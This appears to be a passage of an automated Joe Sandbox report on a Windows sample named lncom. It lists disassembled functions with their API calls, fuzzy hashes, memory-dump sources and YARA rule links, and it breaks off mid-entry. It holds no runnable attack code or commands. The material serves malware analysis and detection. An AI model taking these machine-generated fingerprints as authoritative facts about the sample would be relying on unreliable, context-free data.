String ID:
API String ID: 3722451504-0
Opcode ID: 152fdb68f499de961c8643ebe852ae7bb607e8b6a7e98bfad536f33eb06ac7a0
Instruction ID: 98455c90a2e2413251e5233230c5035aa75e187f4876f313581a6cd4510b11ca
Opcode Fuzzy Hash: 152fdb68f499de961c8643ebe852ae7bb607e8b6a7e98bfad536f33eb06ac7a0
Instruction Fuzzy Hash: 3221883190010DEEDB00EFD5C845BDDBBB8EF59314F20812BE804B6251D7789A498B79

Uniqueness

Uniqueness Score: -1.00%

Function 0048F198 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32 ref: 0048F1BF
GetSystemMetrics.USER32(0000004A), ref: 0048F1E6
GetSystemMetrics.USER32(0000002A), ref: 0048F1F5
GetCPInfo.KERNEL32(00000000,?,0000002A,0000004A), ref: 0048F209

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: MetricsSystem$InfoLocaleThread
String ID:
API String ID: 1011932403-0
Opcode ID: 0a5734de0d30a8cc67ac31ec7152900e97f28562da38d70f0462efca325983d3
Instruction ID: f736f836539de97b63dd707ed1952f05f3fb949e4c13676e8aff96c72e33ff3d
Opcode Fuzzy Hash: 0a5734de0d30a8cc67ac31ec7152900e97f28562da38d70f0462efca325983d3
Instruction Fuzzy Hash: E511080555478259C7207BB5A8011FEFBD48F22314F498CBFD8D947642F619D906D33A

Uniqueness

Uniqueness Score: -1.00%

Function 00432914 Relevance: 6.1, APIs: 4, Instructions: 55registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(00400000,00432900,?), ref: 00432937
RegisterClassA.USER32(005D4A7C), ref: 00432950
CreateWindowExA.USER32(00000080,00432900,004329B4,80000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0043298A
SetWindowLongA.USER32(00000000,00000000,00000000), ref: 004329A8

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: ClassWindow$CreateInfoLongRegister
String ID:
API String ID: 446799716-0
Opcode ID: efd2440c0fda1af129106fa51a2e8393b4812e5eefadf676c1d67292d4306478
Instruction ID: 521e72204e82269d9957db6e9661cf6fff575455df3830ced45b134aecb9466f
Opcode Fuzzy Hash: efd2440c0fda1af129106fa51a2e8393b4812e5eefadf676c1d67292d4306478
Instruction Fuzzy Hash: A41121B1A41208BFDB20DBE8DD45BAE77F8AF18700F10509BB640E7290D6795A44DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00491664 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(005DB0C4), ref: 0049167A
RtlEnterCriticalSection.NTDLL(005DB0C4), ref: 0049168D
LocalAlloc.KERNEL32(00000000,00000FF8,005DB0C4,00000000,0049171A,?,?,00491EDE,?,?,?,?,?,004918ED,00491B1B,00491B40), ref: 004916B7
RtlLeaveCriticalSection.NTDLL(005DB0C4), ref: 00491714

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 113dbedda51e4aeaf59489ee3f011770f62d18916f1b7bfd4edefbbf29cc31c7
Instruction ID: 2f7e22c804105b2d14ed0c2dbaf192e97595fa67070113ce47817693a667bbe5
Opcode Fuzzy Hash: 113dbedda51e4aeaf59489ee3f011770f62d18916f1b7bfd4edefbbf29cc31c7
Instruction Fuzzy Hash: AE01E570945282CEFB316BAA981B71A3FD6F715704F02847FB100863B1CBB90845DB29

Uniqueness

Uniqueness Score: -1.00%

Function 00418F24 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 284COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000), ref: 00418F88
FreeLibrary.KERNEL32(00000000), ref: 00418FA0

Strings

=, xrefs: 00418F57

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CurrentFreeLibraryProcess
String ID: =
API String ID: 2127974256-2322244508
Opcode ID: 610e5fc353de0304fce70251afbff0b202495de2e99e429c52f141bace81ae3b
Instruction ID: 49cac696a4f712a54583f3fcc829249e5c655a3da64b797ed6bfd06777661472
Opcode Fuzzy Hash: 610e5fc353de0304fce70251afbff0b202495de2e99e429c52f141bace81ae3b
Instruction Fuzzy Hash: 63C10C34A10008EBEB41EBD9D54679DF379EF86308F5480EAA814A7783C7BD9F019B59

Uniqueness

Uniqueness Score: -1.00%

Function 00418F3C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 269COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000), ref: 00418F88
FreeLibrary.KERNEL32(00000000), ref: 00418FA0

Strings

=, xrefs: 00418F57

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CurrentFreeLibraryProcess
String ID: =
API String ID: 2127974256-2322244508
Opcode ID: ad00cf074d743ca9e022503a660a5e13176ca81ff13a4b09735499edca428638
Instruction ID: 3c51e2a30a17fc828de96cbaabd3932368fd123fa6b61762a9ffc357db636dc8
Opcode Fuzzy Hash: ad00cf074d743ca9e022503a660a5e13176ca81ff13a4b09735499edca428638
Instruction Fuzzy Hash: 97B10E30A10008EBEB41EBD9D54679DF379FF86308F5480AAA814A7783C7BD9F019B59

Uniqueness

Uniqueness Score: -1.00%

Function 004012F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EC), ref: 0040132C
SetWindowLongA.USER32(?,000000EC,00000080), ref: 00401350

Part of subcall function 0046E10C: SetWindowTextA.USER32(?,00000000), ref: 0046E156

Strings

<=], xrefs: 004013A5

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Window$Long$Text
String ID: <=]
API String ID: 3734716533-2902630417
Opcode ID: 9a1d13c7a7114cf440f0d88496a7dfe84573d873887dc8e09d8dca12076834f2
Instruction ID: eb4430e615f4f156412b4d55e400cd0ac51ff718e46be4ae687a32609ddd12d5
Opcode Fuzzy Hash: 9a1d13c7a7114cf440f0d88496a7dfe84573d873887dc8e09d8dca12076834f2
Instruction Fuzzy Hash: DB215334620104DFC710DBA5D885A9D77F5FF89318F10415BE5019B3B2EB79AC05DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00467BF0 Relevance: 4.6, APIs: 3, Instructions: 148COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00000000,?,00000000), ref: 00467CAF
MulDiv.KERNEL32(?,00000000,00000000), ref: 00467D27
MulDiv.KERNEL32(?,00000000,00000000), ref: 00467D56

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f163debe31fc8484ec94d45304a714e2842d807ed6d92d0a0bcd12d52edc7283
Instruction ID: 0d59eb70a2c3e018476d07c72f15b5f3d018ef13574471787694a8f667dc461b
Opcode Fuzzy Hash: f163debe31fc8484ec94d45304a714e2842d807ed6d92d0a0bcd12d52edc7283
Instruction Fuzzy Hash: D551FA34B00544EFC714DB59C989BAEB7F5AF48308F6540F6E408DB322DB78AE409B55

Uniqueness

Uniqueness Score: -1.00%

Function 004A0268 Relevance: 4.6, APIs: 3, Instructions: 146COMMON

Download Yara Rule

APIs

GetEnvironmentStrings.KERNEL32 ref: 004A02C6
GetCommandLineA.KERNEL32 ref: 004A02D0
GetModuleHandleA.KERNEL32(00000000,00000000,008E3482,00000000), ref: 004A03AE

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CommandEnvironmentHandleLineModuleStrings
String ID:
API String ID: 1584138308-0
Opcode ID: cf08066b063c264c0327c0dbf2a5e1255dc74173696eb8f266bf546bc2f11068
Instruction ID: 1eb6ccf7f69e4649e02cfb39bc01b0f1dcf4383d697602f90ce67d06b37ab9a2
Opcode Fuzzy Hash: cf08066b063c264c0327c0dbf2a5e1255dc74173696eb8f266bf546bc2f11068
Instruction Fuzzy Hash: 4E410571804200ABDF30EF69DC91B6B77A9BF2A314F14411FEA558B342DB39A845CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00432A60 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

@Wsocket@WSocketUnloadWinsock$qqrv.LNCOM ref: 00432AC7
@Wsocket@TCustomWSocket@DeleteBufferedData$qqrv.LNCOM ref: 00432AD6
SetWindowLongA.USER32(?,00000000,00000000), ref: 00432AFC

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$BufferedCustomData$qqrvDeleteLongSocketSocket@UnloadWindowWinsock$qqrv
String ID:
API String ID: 1023576636-0
Opcode ID: feb668dac86318af95846ea2a28569eeee595f2ae434c6a726cdfeed5d998fc0
Instruction ID: 0e1694f61876c9f70d1305aa829785219145fd321f71e1afbd19f18466808da1
Opcode Fuzzy Hash: feb668dac86318af95846ea2a28569eeee595f2ae434c6a726cdfeed5d998fc0
Instruction Fuzzy Hash: 04218331604204EFDB11EB69D942A8E7BF5FF09314F6101B6F404A7261DB75AE00DB48

Uniqueness

Uniqueness Score: -1.00%

Function 0044AAD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,005DA78C), ref: 0044AAF4

Part of subcall function 0048DCAC: FormatMessageA.KERNEL32(00003000,00000000,?,00000000,?,00000100,00000000), ref: 0048DCCB

Strings

WSAStartup, xrefs: 0044AB1A

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: FormatMessageStartup
String ID: WSAStartup
API String ID: 3641380939-2700475539
Opcode ID: c93f038e3a4343cd6467677d6e7266b3e094d38b673f0a1c4565f37f60bf46b8
Instruction ID: 4a2921dfc76b2367a95f49873640299c00c165ff9797391f555926b24341e389
Opcode Fuzzy Hash: c93f038e3a4343cd6467677d6e7266b3e094d38b673f0a1c4565f37f60bf46b8
Instruction Fuzzy Hash: 0A019674A043899FEB00DFA5C892AAFBBF9E705304F50447BE51093381D7BD69048B66

Uniqueness

Uniqueness Score: -1.00%

Function 0044AB7C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43networkCOMMON

Download Yara Rule

APIs

WSACleanup.WS2_32 ref: 0044AB96

Part of subcall function 0048DCAC: FormatMessageA.KERNEL32(00003000,00000000,?,00000000,?,00000100,00000000), ref: 0048DCCB

Strings

WSACleanup, xrefs: 0044ABBC

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CleanupFormatMessage
String ID: WSACleanup
API String ID: 1834180691-2385746108
Opcode ID: 2193225f715ba1ef0d536aba729da27622cbc7ab41bba504126583f616862dd2
Instruction ID: 54fe41a2e5f3db66bbe0738abfc845d53bb0e8440f97006a57017d37e7f4eccf
Opcode Fuzzy Hash: 2193225f715ba1ef0d536aba729da27622cbc7ab41bba504126583f616862dd2
Instruction Fuzzy Hash: 33017574A0424A9FEB01DFA5C8926AFBBF8EB09304F50487BE510D7381D77C9904CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00491D38 Relevance: 3.1, APIs: 2, Instructions: 122COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(005DB0C4), ref: 00491D7B

Part of subcall function 00491664: RtlInitializeCriticalSection.NTDLL(005DB0C4), ref: 0049167A
Part of subcall function 00491664: RtlEnterCriticalSection.NTDLL(005DB0C4), ref: 0049168D
Part of subcall function 00491664: LocalAlloc.KERNEL32(00000000,00000FF8,005DB0C4,00000000,0049171A,?,?,00491EDE,?,?,?,?,?,004918ED,00491B1B,00491B40), ref: 004916B7
Part of subcall function 00491664: RtlLeaveCriticalSection.NTDLL(005DB0C4), ref: 00491714

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
String ID:
API String ID: 296031713-0
Opcode ID: 3c801a4addfff4ffdcd6a29470fe707527e769afe10a0426d00895257b66a2a6
Instruction ID: 544b5c0436dcbe2bb69dfeae803300d8d82fd383a936ba86a31682d5f5f7efe7
Opcode Fuzzy Hash: 3c801a4addfff4ffdcd6a29470fe707527e769afe10a0426d00895257b66a2a6
Instruction Fuzzy Hash: A041E1B1A02302DFEF25CF69DC9266A7BA2FB64354F16427FD40187361D738A805DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004512FC Relevance: 3.1, APIs: 2, Instructions: 94registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00451401), ref: 00451376
RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00451401), ref: 004513AA

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 09710663dbaf412dd513c144a21809cb77621b58410b105b0eb5015d167cb0df
Instruction ID: 368ed50c8ef69653a794b57d7f0d921b08239e1eeda6664d9b1b54d6cf705365
Opcode Fuzzy Hash: 09710663dbaf412dd513c144a21809cb77621b58410b105b0eb5015d167cb0df
Instruction Fuzzy Hash: A7316471E002087BEF11DBA5C851B9FB7B8AF05705F1485BAF910E3692D778AE09C758

Uniqueness

Uniqueness Score: -1.00%

Function 00451220 Relevance: 3.1, APIs: 2, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004512EC), ref: 00451297
RegCloseKey.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004512EC), ref: 004512AB

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CloseCreate
String ID:
API String ID: 2932200918-0
Opcode ID: 5a41e3888baf338f4e0ce34e734b535aa6b951a2baa5f1b0aee317876e329e52
Instruction ID: f4f99c2c61e25530e02d6b64b109a859f9383dfdfaf531f544336dc5db45a707
Opcode Fuzzy Hash: 5a41e3888baf338f4e0ce34e734b535aa6b951a2baa5f1b0aee317876e329e52
Instruction Fuzzy Hash: CA218475B002086BDB11EBA5CC52FAFBBEC9B45705F10007BB900E7392DA78AE058659

Uniqueness

Uniqueness Score: -1.00%

Function 004704F0 Relevance: 3.0, APIs: 2, Instructions: 47timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,00000001,00000000,0047056F,?,?,?,00000000,?,00470589,0040EECD), ref: 0047050D
SetTimer.USER32(?,00000001,?,00000000), ref: 0047052F

Part of subcall function 004950E0: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00495111

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Timer$KillLoadString
String ID:
API String ID: 1423459280-0
Opcode ID: e5d7b1f972ccec2067bb8b8df5f70f8d7aeeb774c8b0d0d46c680809e36908c9
Instruction ID: 34ba4b2e98e75036a70169ac8ef3ffd3cfc60efa7d49da1aea76790db7f47a33
